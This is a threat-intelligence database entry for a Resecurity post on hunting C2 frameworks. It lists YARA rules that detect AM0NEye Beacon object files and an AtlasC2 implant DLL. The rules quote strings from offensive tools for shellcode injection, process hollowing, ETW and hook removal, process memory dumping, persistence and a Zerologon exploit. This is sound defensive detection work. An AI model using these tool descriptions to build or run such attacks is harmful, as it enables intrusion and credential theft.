ioc[.]one - OSINT Cyber Threat Intelligence Database

Resecurity | C2 Frameworks - Threat Hunting in Action with YARA Rules

Tags

maec-delivery-vectors:	Watering Hole
attack-pattern:	Data Models Credentials - T1589.001 Dns - T1071.004 Dns - T1590.002 Domains - T1583.001 Domains - T1584.001 Javascript - T1059.007 Malware - T1587.001 Malware - T1588.001 Powershell - T1059.001 Python - T1059.006 Server - T1583.004 Server - T1584.004 Software - T1592.002 Connection Proxy - T1090 Powershell - T1086

Show in Graph

Common Information

Type	Value
UUID	9cb7028e-ea21-477c-bcb6-d59609f35418
Fingerprint	8f322c73ec3b6471
Analysis status	DONE
Considered CTI value	2
Text language
Published	Aug. 2, 2024, midnight
Added to db	Aug. 31, 2024, 10:04 a.m.
Last updated	Nov. 17, 2024, 7:44 p.m.
Headline	C2 Frameworks - Threat Hunting in Action with YARA Rules
Title	Resecurity \| C2 Frameworks - Threat Hunting in Action with YARA Rules
Detected Hints/Tags/Attributes	145/2/396

Source URLs

	Redirection	Url
Details	Source	https://www.resecurity.com/blog/article/c2-frameworks-threat-hunting-in-action-with-yara-rules

URL Provider

Details	Provider	Source level domain
Details	resecurity.com	www.resecurity.com

RSS Feed

Details	Id	Enabled	Feed title	Url	Added to db
Details	364	✔	Resecurity	https://www.resecurity.com/feed	2024-08-30 22:08

Attributes

Details	Type	#Events	Value
Details	Yara rule	1	import "hash" rule AM0NEye_EtwX86 { meta: description = "AM0NEye - etw.x86.o" sha256 = "a14d6a30e886a19d47fad3e66b8dd5a6ead3e3a0bd7f8d3a6e001542740e9190" strings: $s1 = "__imp__KERNEL32$GetCurrentProcess@0" ascii fullword $s2 = "__imp__KERNEL32$ReadProcessMemory@20" ascii fullword $s3 = "ReadProcessMemory failed" ascii fullword $s4 = "__imp__KERNEL32$GetProcAddress@8" ascii fullword $s5 = "Failed to find function address" ascii fullword $s6 = "__imp__KERNEL32$LoadLibraryA@4" ascii fullword $s7 = "__imp__KERNEL32$VirtualProtect@16" ascii fullword $s8 = "__imp__BeaconDataExtract" ascii fullword $s9 = "__imp__MSVCRT$strcmp" ascii fullword $s10 = "__imp__BeaconPrintf" ascii fullword $s11 = "__imp__BeaconDataParse" ascii fullword $s12 = "Could not load library" ascii fullword $s13 = "__imp__MSVCRT$memcpy" ascii fullword $s14 = "Working with 32-bit." ascii fullword $s15 = "0`.data" ascii fullword $s16 = "GCC: (GNU) 10-win32 20220324" ascii fullword condition: hash.sha256(0, filesize) == "a14d6a30e886a19d47fad3e66b8dd5a6ead3e3a0bd7f8d3a6e001542740e9190" or uint16(0) == 0x014c and filesize < 6KB and 8 of them }
Details	Yara rule	1	import "hash" rule AM0NEye_FindModule { meta: description = "AM0NEye - FindModule.o" sha256 = "6382401da4b33f85be0491f73d26080748821f25ce457dfee4c55c43308867c4" strings: $s1 = "ExecuteSimpleSystemCallBase_Epilogue" ascii fullword $s2 = "EnumerateProcessModules" ascii fullword $s3 = "ExecuteSimpleSystemCallBase_Check_6_X_XXXX" ascii fullword $s4 = "ExecuteSimpleSystemCallBase_Finished" ascii fullword $s5 = "ExecuteSimpleSystemCallBase_SystemCall_6_3_XXXX" ascii fullword $s6 = "ExecuteSimpleSystemCallBase_SystemCall_6_2_XXXX" ascii fullword $s7 = "ExecuteSimpleSystemCallBase_SystemCall_10_0_XXXX" ascii fullword $s8 = "ExecuteSimpleSystemCallBase_Check_6_1_XXXX" ascii fullword $s9 = "ExecuteSimpleSystemCallBase_Check_X_X_XXXX" ascii fullword $s10 = "ExecuteSimpleSystemCallBase_SystemCall_6_1_7601" ascii fullword $s11 = "ExecuteSimpleSystemCallBase_SystemCall_Unknown" ascii fullword $s12 = "ExecuteSimpleSystemCallBase" ascii fullword $s13 = "IsElevated" ascii fullword $s14 = "__imp_ADVAPI32$LookupPrivilegeValueW" ascii fullword $s15 = " ProcessID: %lu" ascii fullword $s16 = " ProcessName: %wZ" ascii fullword $s17 = "GetCurrentPid" ascii fullword $s18 = "SeDebugPrivilege" wide fullword $s19 = "FindModule.c" ascii fullword $s20 = "__imp_MSVCRT$_wcsicmp" ascii fullword condition: hash.sha256(0, filesize) == "6382401da4b33f85be0491f73d26080748821f25ce457dfee4c55c43308867c4" or uint16(0) == 0x8664 and filesize < 20KB and 8 of them }
Details	Yara rule	1	import "hash" rule AM0NEye_FindProcHandle { meta: description = "AM0NEye - FindProcHandle.o" sha256 = "147cf27ec2845164782b690977545697f77e7df3acc904118722d071eadad0aa" strings: $s1 = "ExecuteSimpleSystemCallBase_Epilogue" ascii fullword $s2 = "ExecuteSimpleSystemCallBase_Check_6_X_XXXX" ascii fullword $s3 = "ExecuteSimpleSystemCallBase_Finished" ascii fullword $s4 = "ExecuteSimpleSystemCallBase_SystemCall_6_3_XXXX" ascii fullword $s5 = "ExecuteSimpleSystemCallBase_SystemCall_6_2_XXXX" ascii fullword $s6 = "ExecuteSimpleSystemCallBase_SystemCall_10_0_XXXX" ascii fullword $s7 = "ExecuteSimpleSystemCallBase_Check_6_1_XXXX" ascii fullword $s8 = "ExecuteSimpleSystemCallBase_Check_X_X_XXXX" ascii fullword $s9 = "ExecuteSimpleSystemCallBase_SystemCall_6_1_7601" ascii fullword $s10 = "ExecuteSimpleSystemCallBase_SystemCall_Unknown" ascii fullword $s11 = "ExecuteSimpleSystemCallBase" ascii fullword $s12 = "IsElevated" ascii fullword $s13 = "Failed to obtain ProcessId..." ascii fullword $s14 = "__imp_ADVAPI32$LookupPrivilegeValueW" ascii fullword $s15 = " ProcessID: %lu" ascii fullword $s16 = " ProcessName: %ls" ascii fullword $s17 = "GetPid" ascii fullword $s18 = "Process" wide fullword $s19 = "SeDebugPrivilege" wide fullword $s20 = "__imp_MSVCRT$_wcsicmp" ascii fullword condition: hash.sha256(0, filesize) == "147cf27ec2845164782b690977545697f77e7df3acc904118722d071eadad0aa" or uint16(0) == 0x8664 and filesize < 20KB and 8 of them }
Details	Yara rule	1	import "hash" rule AM0NEye_GetDomainInfo { meta: description = "AM0NEye - GetDomainInfo.o" sha256 = "039586f2d56ef93343980bf7734c350f6898acc457c1bae184391439c1820d86" strings: $s1 = "__imp_NETAPI32$DsGetDcNameA" ascii fullword $s2 = "Domain Controller Address: %s" ascii fullword $s3 = "Domain Controller: %s" ascii fullword $s4 = "Domain Forest Name: %s" ascii fullword $s5 = "__imp_NETAPI32$NetApiBufferFree" ascii fullword $s6 = "DC Site Name: %s" ascii fullword $s7 = "GCC: (GNU) 10-win32 20220324" ascii fullword $s8 = "P@.xdata" ascii fullword condition: hash.sha256(0, filesize) == "039586f2d56ef93343980bf7734c350f6898acc457c1bae184391439c1820d86" or uint16(0) == 0x8664 and filesize < 2KB and all of them }
Details	Yara rule	1	import "hash" rule AM0NEye_RegistryPersistence { meta: description = "AM0NEye - RegistryPersistence.o" sha256 = "f5b1230386f9242f4c88edf893b7d97d901fb55d794c0f27a520d093b232e643" strings: $s1 = "__imp_ADVAPI32$RegOpenKeyExW" ascii fullword $s2 = "Failed to open key " ascii fullword $s3 = "Key deleted in registry, persistence removed. " ascii fullword $s4 = "__imp_ADVAPI32$RegCloseKey" ascii fullword $s5 = "Unsuccessful in opening key " ascii fullword $s6 = "__imp_ADVAPI32$RegDeleteKeyValueW" ascii fullword $s7 = "Key opened " ascii fullword $s8 = "Key changed in registry, persistence installed " ascii fullword $s9 = "Key not changed in registry " ascii fullword $s10 = "Key not deleted in registry " ascii fullword $s11 = "Update" wide fullword $s12 = "Install" ascii fullword $s13 = "__imp_MSVCRT$strcmp" ascii fullword $s14 = "__imp_ADVAPI32$RegSetValueExW" ascii fullword $s15 = "Please use either an Install or Remove argument." ascii fullword $s16 = "RemovePersistence" ascii fullword $s17 = "InstallPersistence" ascii fullword $s18 = "Remove" ascii fullword $s19 = "Cannot find key value in registry " ascii fullword $s20 = "Key location open successful " ascii fullword condition: hash.sha256(0, filesize) == "f5b1230386f9242f4c88edf893b7d97d901fb55d794c0f27a520d093b232e643" or uint16(0) == 0x8664 and filesize < 8KB and 8 of them }
Details	Yara rule	1	import "hash" rule AM0NEye_cThreadHijack { meta: description = "AM0NEye - cThreadHijack.o" sha256 = "d6fd0dd6a3a4bde08a2354e9298c1dacc6495c2173100b489e3c1d4526817a40" strings: $x1 = "[+] Wrote Beacon shellcode to the remote process!" ascii fullword $x2 = "[+] Target process PID: %d" ascii fullword $s3 = "[+] Successfully pointed the target thread's RIP register to the shellcode!" ascii fullword $s4 = "[+] Found a thread in the target process! Thread ID: %d" ascii fullword $s5 = "[+] Size of shellcode: %d bytes" ascii fullword $s6 = "C:\\Users\\ANON\\Desktop\\cThreadHijack\\cThreadHijack.o" ascii fullword $s7 = "__imp_KERNEL32$OpenProcess" ascii fullword $s8 = "__imp_KERNEL32$WriteProcessMemory" ascii fullword $s9 = "Error! Unable to set the target thread's RIP register. Error: 0x%lx" ascii fullword $s10 = "Error! Unable to write shellcode to allocated buffer. Error: 0x%lx" ascii fullword $s11 = "Error! Unable to get the state of the target thread. Error: 0x%lx" ascii fullword $s12 = "Error! Unable to open a handle to the process. Error: 0x%lx" ascii fullword $s13 = "__imp_KERNEL32$GetLastError" ascii fullword $s14 = "[+] Resuming the thread! Please wait for the Beacon payload to execute. This could take some time..." ascii fullword $s15 = "__imp_KERNEL32$GetThreadContext" ascii fullword $s16 = "[+] Suspending the targeted thread..." ascii fullword $s17 = "[+] Virtual memory for CreateThread and NtContinue routines allocated at 0x%llx inside of the remote process!" ascii fullword $s18 = "Error! Unable to allocate memory in the remote process. Error: 0x%lx" ascii fullword $s19 = "Error! Unable to allocate memory within the remote process. Error: 0x%lx" ascii fullword $s20 = "__imp_KERNEL32$GetModuleHandleA" ascii fullword condition: hash.sha256(0, filesize) == "d6fd0dd6a3a4bde08a2354e9298c1dacc6495c2173100b489e3c1d4526817a40" or uint16(0) == 0x8664 and filesize < 20KB and 1 of ($x*) and 4 of them }
Details	Yara rule	1	import "hash" rule AM0NEye_UnhookX64 { meta: description = "AM0NEye - unhook.x64.o" sha256 = "3a9a917e6760f130a71ad17184b7f6ea67787ce0cbd9cfa0260e72b085e6aebe" strings: $s1 = "C:\\Users\\user\\Desktop\\unhook-bof\\unhook.x64.o" ascii fullword $s2 = "$pdata$GetProcessEnvironmentBlock" ascii fullword $s3 = "$unwind$GetProcessEnvironmentBlock" ascii fullword $s4 = "GetProcessEnvironmentBlock" ascii fullword $s5 = "__imp_KERNEL32$GetModuleHandleW" ascii fullword $s6 = "__imp_KERNEL32$CloseHandle" ascii fullword $s7 = "__imp_KERNEL32$VirtualProtect" ascii fullword $s8 = "$unwind$GetRedirectedName" ascii fullword $s9 = "$pdata$GetRedirectedName_V4" ascii fullword $s10 = "$unwind$GetRedirectedName_V6" ascii fullword $s11 = "IsBeaconDLL" ascii fullword $s12 = "__imp_KERNEL32$CreateFileW" ascii fullword $s13 = "$pdata$GetRedirectedName_V2" ascii fullword $s14 = "__imp_KERNEL32$UnmapViewOfFile" ascii fullword $s15 = "__imp_KERNEL32$LoadLibraryW" ascii fullword $s16 = "$pdata$IsBeaconDLL" ascii fullword $s17 = "$unwind$GetRedirectedName_V4" ascii fullword $s18 = "$unwind$CustomGetModuleHandleW" ascii fullword $s19 = "$pdata$GetRedirectedName_V6" ascii fullword $s20 = "$unwind$IsBeaconDLL" ascii fullword condition: hash.sha256(0, filesize) == "3a9a917e6760f130a71ad17184b7f6ea67787ce0cbd9cfa0260e72b085e6aebe" or uint16(0) == 0x8664 and filesize < 40KB and 8 of them }
Details	Yara rule	1	import "hash" rule AM0NEye_CurlX64 { meta: description = "AM0NEye - curl.x64.o" sha256 = "a72a9b039ddd668ce86022621c6d073048b0d4ab38beb0d9bc98287e5a14c206" strings: $s1 = "User Agent: %s" ascii fullword $s2 = "__imp_KERNEL32$lstrlenA" ascii fullword $s3 = "__imp_WININET$HttpSendRequestA" ascii fullword $s4 = "__imp_WININET$InternetReadFile" ascii fullword $s5 = "sendHttpRequest" ascii fullword $s6 = "Retrieving HTTP Request info failed" ascii fullword $s7 = "__imp_WININET$HttpOpenRequestA" ascii fullword $s8 = "__imp_WININET$HttpQueryInfoA" ascii fullword $s9 = "%s %s:%i %s" ascii fullword $s10 = "Response Code: %s" ascii fullword $s11 = "__imp_BeaconDataInt" ascii fullword $s12 = "__imp_WININET$InternetConnectA" ascii fullword $s13 = "__imp_MSVCRT$strtok" ascii fullword $s14 = "__imp_MSVCRT$strcmp" ascii fullword $s15 = "entry.c" ascii fullword $s16 = "No response." ascii fullword $s17 = "__imp_WININET$InternetCloseHandle" ascii fullword $s18 = "__imp_WININET$InternetOpenA" ascii fullword $s19 = "P@.xdata" ascii fullword $s20 = "GCC: (GNU) 10-win32 20200525" ascii fullword condition: hash.sha256(0, filesize) == "a72a9b039ddd668ce86022621c6d073048b0d4ab38beb0d9bc98287e5a14c206" or uint16(0) == 0x8664 and filesize < 10KB and 8 of them }
Details	Yara rule	1	import "hash" rule AM0NEye_EtwX64 { meta: description = "AM0NEye - etw.x64.o" sha256 = "3b74e42f53475b6bb3792e9a8b5de22e6ab7a8037c10bfa2efca4d8fa2eb66be" strings: $s1 = "__imp_KERNEL32$GetCurrentProcess" ascii fullword $s2 = "__imp_KERNEL32$ReadProcessMemory" ascii fullword $s3 = "ReadProcessMemory failed" ascii fullword $s4 = "__imp_KERNEL32$GetProcAddress" ascii fullword $s5 = "Failed to find function address" ascii fullword $s6 = "__imp_KERNEL32$LoadLibraryA" ascii fullword $s7 = "__imp_KERNEL32$VirtualProtect" ascii fullword $s8 = "__imp_MSVCRT$strcmp" ascii fullword $s9 = "Could not load library" ascii fullword $s10 = "Working with 64-bit." ascii fullword $s11 = "__imp_MSVCRT$memcpy" ascii fullword $s12 = "P@.xdata" ascii fullword $s13 = "GCC: (GNU) 10-win32 20200525" ascii fullword condition: hash.sha256(0, filesize) == "3b74e42f53475b6bb3792e9a8b5de22e6ab7a8037c10bfa2efca4d8fa2eb66be" or uint16(0) == 0x8664 and filesize < 6KB and 8 of them }
Details	Yara rule	1	import "hash" rule AM0NEye_ProcessHollowingX64 { meta: description = "AM0NEye - process-hollowing.x64.o" sha256 = "a453b3510ef0aa993b88f49d2a6f7a85bfab407033afb23340287b94eddff86d" strings: $x1 = "[+] Success - Your thread was resumed and your shellcode is being executed within the remote process!" ascii fullword $x2 = "[+] Success - Spawned process for %s at %d (PID)" ascii fullword $x3 = "[!] Failure - Could not queue APC for main thread of %d (PID) to shellcode address 0x%p" ascii fullword $x4 = "[+] Success - APC queued for main thread of %d (PID) to shellcode address 0x%p" ascii fullword $x5 = "[!] Failure - Could not create a process for %s using CreateProcessA()" ascii fullword $s6 = "[+] Success - Wrote %d bytes to memory in remote process %d (PID) at 0x%p" ascii fullword $s7 = "[!] Failure - Could not allocate memory to remote process %d (PID)" ascii fullword $s8 = "[+] Success - Allocated RE memory in remote process %d (PID) at: 0x%p" ascii fullword $s9 = "[!] Failure - Could not write payload to memory at 0x%p" ascii fullword $s10 = "__imp_KERNEL32$WriteProcessMemory" ascii fullword $s11 = "[!] Failure - Could not resume thread." ascii fullword $s12 = "__imp_KERNEL32$CreateProcessA" ascii fullword $s13 = "__imp_KERNEL32$ResumeThread" ascii fullword $s14 = "__imp_KERNEL32$QueueUserAPC" ascii fullword $s15 = "__imp_KERNEL32$VirtualAllocEx" ascii fullword $s16 = "__imp_MSVCRT$memset" ascii fullword $s17 = "__imp_BeaconDataLength" ascii fullword $s18 = "hollow.x64.c" ascii fullword $s19 = "P@.xdata" ascii fullword $s20 = "GCC: (GNU) 12 20220819" ascii fullword condition: hash.sha256(0, filesize) == "a453b3510ef0aa993b88f49d2a6f7a85bfab407033afb23340287b94eddff86d" or uint16(0) == 0x8664 and filesize < 10KB and 1 of ($x*) and 4 of them }
Details	Yara rule	1	import "hash" rule AM0NEye_SecinjectX64 { meta: description = "AM0NEye - secinject.x64.o" sha256 = "1e5a2a850f7cbfc5d306487ec75bbd436e5c8652304ad2b2a8a14b3386e63efd" strings: $s1 = "__imp_KERNEL32$GetCurrentProcess" ascii fullword $s2 = "__imp_KERNEL32$OpenProcess" ascii fullword $s3 = "[!] Error mapping remote process. Aborting..." ascii fullword $s4 = "__imp_KERNEL32$CreateRemoteThread" ascii fullword $s5 = "secinject.c" ascii fullword $s6 = "[!] Error mapping local process Aborting..." ascii fullword $s7 = "[!] Error unmapping view" ascii fullword $s8 = "__imp_NTDLL$NtUnmapViewOfSection" ascii fullword $s9 = "__imp_NTDLL$NtMapViewOfSection" ascii fullword $s10 = "__imp_NTDLL$NtClose" ascii fullword $s11 = "__imp_NTDLL$NtCreateSection" ascii fullword $s12 = "[!] Error closing handle" ascii fullword $s13 = "mycopy" ascii fullword $s14 = "mycmpi" ascii fullword $s15 = "__imp_BeaconDataInt" ascii fullword $s16 = "[!] Error creating RWX memory section Aborting..." ascii fullword $s17 = "GCC: (GNU) 10-win32 20210110" ascii fullword $s18 = "0@.rdata" ascii fullword condition: hash.sha256(0, filesize) == "1e5a2a850f7cbfc5d306487ec75bbd436e5c8652304ad2b2a8a14b3386e63efd" or uint16(0) == 0x8664 and filesize < 8KB and 8 of them }
Details	Yara rule	1	import "hash" rule AM0NEye_SyscallsdumpX64 { meta: description = "AM0NEye - syscallsdump.x64.o" sha256 = "b33dc013e2168ebb37d8ac80dbcd778c6bda2ede4927b47ec95f32c87ad125fd" strings: $s1 = "Dumping PID %d to file: %s" ascii fullword $s2 = "Failed to retrieve PID %d process handle." ascii fullword $s3 = "Failed to create dump file at %s" ascii fullword $s4 = "Failed to set debug privilege." ascii fullword $s5 = "Failed to create minidump." ascii fullword $s6 = "Unhooking - Initial ZwProtectVirtualMemory failed." ascii fullword $s7 = "Unhooking - ZwWriteVirtualMemory failed." ascii fullword $s8 = "Unhooking - Final ZwProtectVirtualMemory failed." ascii fullword $s9 = "__imp_DBGHELP$MiniDumpWriteDump" ascii fullword $s10 = "__imp_ADVAPI32$LookupPrivilegeValueW" ascii fullword $s11 = "Failed to unhook NtReadVirtualMemory." ascii fullword $s12 = " [!] OS Version not supported." ascii fullword $s13 = "SW2_GetSyscallNumber" ascii fullword $s14 = "SeDebugPrivilege" wide fullword $s15 = "__imp_BeaconDataInt" ascii fullword $s16 = "entry.c" ascii fullword $s17 = "__imp_MSVCRT$_wcsicmp" ascii fullword $s18 = "__imp_MSVCRT$memset" ascii fullword $s19 = "UnhookFunction" ascii fullword $s20 = "__imp_MSVCRT$swprintf_s" ascii fullword condition: hash.sha256(0, filesize) == "b33dc013e2168ebb37d8ac80dbcd778c6bda2ede4927b47ec95f32c87ad125fd" or uint16(0) == 0x8664 and filesize < 30KB and 8 of them }
Details	Yara rule	1	import "hash" rule AM0NEye_SyscallsinjectX64 { meta: description = "AM0NEye - syscallsinject.x64.o" sha256 = "23f0aeb7c61716e936820af851e7f5f04927be31cd540aba7717882161b000fb" strings: $x1 = "Copying shellcode to remote process - FAILED! X" ascii fullword $x2 = "Executing thread in remote process - FAILED! X" ascii fullword $s3 = "Shellcode injection completed successfully!" ascii fullword $s4 = "Opening process - FAILED! X" ascii fullword $s5 = "InjectShellcode" ascii fullword $s6 = "SW2_GetSyscallNumber" ascii fullword $s7 = "__imp_BeaconDataInt" ascii fullword $s8 = "entry.c" ascii fullword $s9 = "__imp_BeaconDataLength" ascii fullword $s10 = "SW2_HashSyscall" ascii fullword $s11 = "GCC: (GNU) 10-win32 20200525" ascii fullword $s12 = "0@.rdata" ascii fullword $s13 = "f=Zwum" ascii fullword $s14 = "SW2_PopulateSyscallList" ascii fullword $s15 = "SW2_SyscallList" ascii fullword condition: hash.sha256(0, filesize) == "23f0aeb7c61716e936820af851e7f5f04927be31cd540aba7717882161b000fb" or uint16(0) == 0x8664 and filesize < 20KB and 1 of ($x*) and 4 of them }
Details	Yara rule	1	import "hash" rule AM0NEye_UnhookX86 { meta: description = "AM0NEye - unhook.x86.o" sha256 = "b67570680ffd7ebf5c8479e364c7a50ccf293170feb195172b9d907b5f171a88" strings: $s1 = "C:\\Users\\user\\Desktop\\unhook-bof\\unhook.x86.o" ascii fullword $s2 = "_GetProcessEnvironmentBlock" ascii fullword $s3 = "__imp__KERNEL32$GetModuleHandleW@4" ascii fullword $s4 = "__imp__KERNEL32$VirtualProtect@16" ascii fullword $s5 = "__imp__KERNEL32$CreateFileMappingW@24" ascii fullword $s6 = "_CustomGetModuleHandleW" ascii fullword $s7 = "__imp__KERNEL32$MapViewOfFile@20" ascii fullword $s8 = "_GetRedirectedName_V6" ascii fullword $s9 = "__imp__KERNEL32$CloseHandle@4" ascii fullword $s10 = "__imp__KERNEL32$UnmapViewOfFile@4" ascii fullword $s11 = "__imp__KERNEL32$LoadLibraryW@4" ascii fullword $s12 = "_GetRedirectedName" ascii fullword $s13 = "_GetInMemoryOrderModuleList" ascii fullword $s14 = "_IsBeaconDLL" ascii fullword $s15 = "__imp__KERNEL32$CreateFileW@28" ascii fullword $s16 = "__imp__KERNEL32$VirtualAlloc@16" ascii fullword $s17 = "_GetRedirectedName_V2" ascii fullword $s18 = "_GetRedirectedName_V4" ascii fullword $s19 = "__imp__KERNEL32$VirtualFree@12" ascii fullword $s20 = "_CustomGetProcAddressEx@12" ascii fullword condition: hash.sha256(0, filesize) == "b67570680ffd7ebf5c8479e364c7a50ccf293170feb195172b9d907b5f171a88" or uint16(0) == 0x014c and filesize < 20KB and 8 of them }
Details	Yara rule	1	import "hash" rule AM0NEye_ZerologonX64 { meta: description = "AM0NEye - zerologon.x64.o" sha256 = "b57f0f8fe3a1682b31f61623ed224b387a56ffa21cba3cf0c75bb27e14536413" strings: $s1 = "z:\\devcenter\\zerologon\\dist\\zerologon.x64.o" ascii fullword $s2 = "%S is not vulnerable" ascii fullword $s3 = "Success! Use pth .\\%S 31d6cfe0d16ae931b73c59d7e0c089c0 and run dcscync" ascii fullword $s4 = "__imp_NETAPI32$I_NetServerPasswordSet2" ascii fullword $s5 = "Failed to set machine account pass for %S" ascii fullword $s6 = "0@ /DEFAULTLIB:\"uuid.lib\" /DEFAULTLIB:\"uuid.lib\" /DEFAULTLIB:\"LIBCMT\" /DEFAULTLIB:\"OLDNAMES\" " ascii fullword $s7 = "@comp.id}y" ascii fullword $s8 = "B.data" ascii fullword $s9 = "$unwind$go" ascii fullword $s10 = "$pdata$go" ascii fullword $s11 = "__imp_NETAPI32$I_NetServerReqChallenge" ascii fullword $s12 = "__imp_NETAPI32$I_NetServerAuthenticate2" ascii fullword $s13 = "31d6cfe0d16ae931b73c59d7e0c089c0" $s14 = "P`.xdata" ascii fullword $s15 = "Microsoft (R) Optimizing Compiler" ascii fullword $s16 = "$SG87893H" ascii fullword $s17 = "$SG87894x" ascii fullword $s18 = "$SG87891" ascii fullword condition: hash.sha256(0, filesize) == "b57f0f8fe3a1682b31f61623ed224b387a56ffa21cba3cf0c75bb27e14536413" or uint16(0) == 0x8664 and filesize < 5KB and 8 of them }
Details	Yara rule	1	import "hash" rule AM0NEye_ZerologonX86 { meta: description = "AM0NEye - zerologon.x86.o" sha256 = "ddd797f2afb0f0cf3e85532d937e475f3af778b6032b979f3b739904b2c7bc07" strings: $s1 = "Z:\\devcenter\\zerologon\\dist\\zerologon.x86.o" ascii fullword $s2 = "%S is not vulnerable" ascii fullword $s3 = "Success! Use pth .\\%S 31d6cfe0d16ae931b73c59d7e0c089c0 and run dcscync" ascii fullword $s4 = "__imp__NETAPI32$I_NetServerPasswordSet2" ascii fullword $s5 = "Failed to set machine account pass for %S" ascii fullword $s6 = "P` /DEFAULTLIB:\"uuid.lib\" /DEFAULTLIB:\"uuid.lib\" /DEFAULTLIB:\"LIBCMT\" /DEFAULTLIB:\"OLDNAMES\" " ascii fullword $s7 = "@comp.id}y" ascii fullword $s8 = "B.data" ascii fullword $s9 = "__imp__BeaconDataExtract" ascii fullword $s10 = "__imp__BeaconPrintf" ascii fullword $s11 = "__imp__BeaconDataParse" ascii fullword $s12 = "__imp__NETAPI32$I_NetServerReqChallenge" ascii fullword $s13 = "31d6cfe0d16ae931b73c59d7e0c089c0" $s14 = "__imp__NETAPI32$I_NetServerAuthenticate2" ascii fullword $s15 = "Microsoft (R) Optimizing Compiler" ascii fullword $s16 = "$SG87301" ascii fullword $s17 = "$SG87303H" ascii fullword $s18 = "$SG87304t" ascii fullword condition: hash.sha256(0, filesize) == "ddd797f2afb0f0cf3e85532d937e475f3af778b6032b979f3b739904b2c7bc07" or uint16(0) == 0x014c and filesize < 4KB and 8 of them }
Details	Yara rule	1	import "hash" rule AM0NEye_CurlX86 { meta: description = "AM0NEye - curl.x86.o" sha256 = "21d2d2a5068827890e30ec5438de5ef22401cd67e5aab69e2a76881c842bd4a4" strings: $s1 = "User Agent: %s" ascii fullword $s2 = "__imp__KERNEL32$lstrlenA@4" ascii fullword $s3 = "Retrieving HTTP Request info failed" ascii fullword $s4 = "__imp__WININET$HttpSendRequestA@20" ascii fullword $s5 = "__imp__WININET$InternetReadFile@16" ascii fullword $s6 = "__imp__WININET$HttpQueryInfoA@20" ascii fullword $s7 = "__imp__WININET$HttpOpenRequestA@32" ascii fullword $s8 = "%s %s:%i %s" ascii fullword $s9 = "Response Code: %s" ascii fullword $s10 = "entry.c" ascii fullword $s11 = "No response." ascii fullword $s12 = "__imp__BeaconDataInt" ascii fullword $s13 = "__imp__WININET$InternetCloseHandle@4" ascii fullword $s14 = "__imp__WININET$InternetOpenA@20" ascii fullword $s15 = "__imp__BeaconDataExtract" ascii fullword $s16 = "__imp__WININET$InternetConnectA@32" ascii fullword $s17 = "__imp__MSVCRT$strtok" ascii fullword $s18 = "__imp__MSVCRT$strcmp" ascii fullword $s19 = "__imp__BeaconPrintf" ascii fullword $s20 = "__imp__BeaconDataParse" ascii fullword condition: hash.sha256(0, filesize) == "21d2d2a5068827890e30ec5438de5ef22401cd67e5aab69e2a76881c842bd4a4" or uint16(0) == 0x014c and filesize < 9KB and 8 of them }
Details	Yara rule	1	import "hash" rule AM0NEye_SyscallsapcspawnX64 { meta: description = "AM0NEye - syscallsapcspawn.x64.o" sha256 = "defaacd4c05addae13998f3dce82e12e2f8f7c48af1e9061071f8157f01f7b61" strings: $s1 = "Shellcode injection completed successfully!" ascii fullword $s2 = "__imp_BeaconSpawnTemporaryProcess" ascii fullword $s3 = "Failed to spawn process." ascii fullword $s4 = "InjectShellcode" ascii fullword $s5 = "Failed to spawn process. Exiting..." ascii fullword $s6 = "NtResumeThread - FAILED! X" ascii fullword $s7 = "Spawned Process with PID: %d" ascii fullword $s8 = "NtQueueApcThread - FAILED! X" ascii fullword $s9 = "__imp_BeaconCleanupProcess" ascii fullword $s10 = "NtUnmapViewOfSection - FAILED! X" ascii fullword $s11 = "NtCreateSection - FAILED! X" ascii fullword $s12 = "NtMapViewOfSection2 - FAILED! X" ascii fullword $s13 = "NtMapViewOfSection - FAILED! X" ascii fullword $s14 = "SW2_GetSyscallNumber" ascii fullword $s15 = "entry.c" ascii fullword $s16 = "__imp_MSVCRT$memcpy" ascii fullword $s17 = "__imp_BeaconDataLength" ascii fullword $s18 = "SW2_HashSyscall" ascii fullword $s19 = "GCC: (GNU) 10-win32 20200525" ascii fullword $s20 = "0@.rdata" ascii fullword condition: hash.sha256(0, filesize) == "defaacd4c05addae13998f3dce82e12e2f8f7c48af1e9061071f8157f01f7b61" or uint16(0) == 0x8664 and filesize < 30KB and 8 of them }
Details	Yara rule	1	import "hash" rule AM0NEye_PopCalc { meta: description = "AM0NEye - popCalc.bin" sha256 = "70488c62e7f56badbde76fb5a5d69fa6d7c1d4243f4a256106a7de2e5b4253ca" strings: $s1 = "AQAPRQVH1" ascii fullword $s2 = "AXAX^YZAXAYAZH" ascii fullword $s3 = "calc.exe" ascii fullword condition: hash.sha256(0, filesize) == "70488c62e7f56badbde76fb5a5d69fa6d7c1d4243f4a256106a7de2e5b4253ca" or uint16(0) == 0x48fc and filesize < 1KB and all of them }
Details	Yara rule	1	import "hash" import "pe" rule AtlasC2_ClientDll { meta: description = "AtlasC2 - Client.dll" sha256 = "86979aca65aef25f18132a2fc328f3d9234298e9d9c3b6cbd4a98a1ac7728c9d" strings: $x1 = "Executes a command in the context of cmd.exe" wide fullword $x2 = "Execute a PS command using the PS DLLs" wide fullword $s3 = "command to execute" wide fullword $s4 = "Client.dll" wide fullword $s5 = "[] Usage: RmDir [targetDir]" wide fullword $s6 = "[] Usage: RmFile [targetFile]" wide fullword $s7 = "Fetch user id of user running implant process" wide fullword $s8 = "<UtilExecute>b__0" ascii fullword $s9 = "UtilExecute" ascii fullword $s10 = "<UtilExecute>b__8_0" ascii fullword $s11 = "ExecuteAssemMethod" wide fullword $s12 = "ExecuteAssem" wide fullword $s13 = "[] Usage: Getuid" wide fullword $s14 = "Execute a specifed assem type from its entry point" wide fullword $s15 = "Executes specified method belonging to a loaded assem type" wide fullword $s16 = "[-] Connection to teamserver could not be established or no implant currently set" wide fullword $s17 = "path to PowerShell file to load into implant process" wide fullword $s18 = "byte array to load into implant process" wide fullword $s19 = "System.ComponentModel.Primitives" ascii fullword $s20 = "System.Net.WebClient" ascii fullword condition: hash.sha256(0, filesize) == "86979aca65aef25f18132a2fc328f3d9234298e9d9c3b6cbd4a98a1ac7728c9d" or uint16(0) == 0x5a4d and filesize < 100KB and 1 of ($x) and 4 of them }
